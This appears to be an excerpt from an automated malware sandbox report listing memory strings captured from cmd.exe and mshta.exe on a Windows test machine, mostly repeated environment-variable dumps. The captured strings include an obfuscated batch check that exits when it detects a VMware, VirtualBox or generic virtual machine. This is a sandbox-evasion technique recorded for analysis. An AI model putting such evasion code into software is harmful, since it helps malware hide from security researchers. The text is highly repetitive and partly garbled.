(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o`
Source: cmd.exe, 0000000B.00000003.1437484301.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O<
Source: cmd.exe, 0000000B.00000003.1444328835.000002C1DCA5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OZ1=O
Source: cmd.exe, 0000000B.00000003.1411474023.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=mdd
Source: cmd.exe, 0000000B.00000003.1438858210.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O=
Source: cmd.exe, 0000000B.00000003.1423026906.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o7
Source: cmd.exe, 0000000B.00000003.1426601427.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oe
Source: cmd.exe, 0000000B.00000003.1432043970.000002C1DCA5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lwindir=C:\Windowsx=my=nz=o
Source: cmd.exe, 0000000B.00000003.1437168952.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O?
Source: mshta.exe, 0000001B.00000002.1486833877.000001C85E2A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit \|;~b
Source: cmd.exe, 0000000B.00000003.1422602282.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 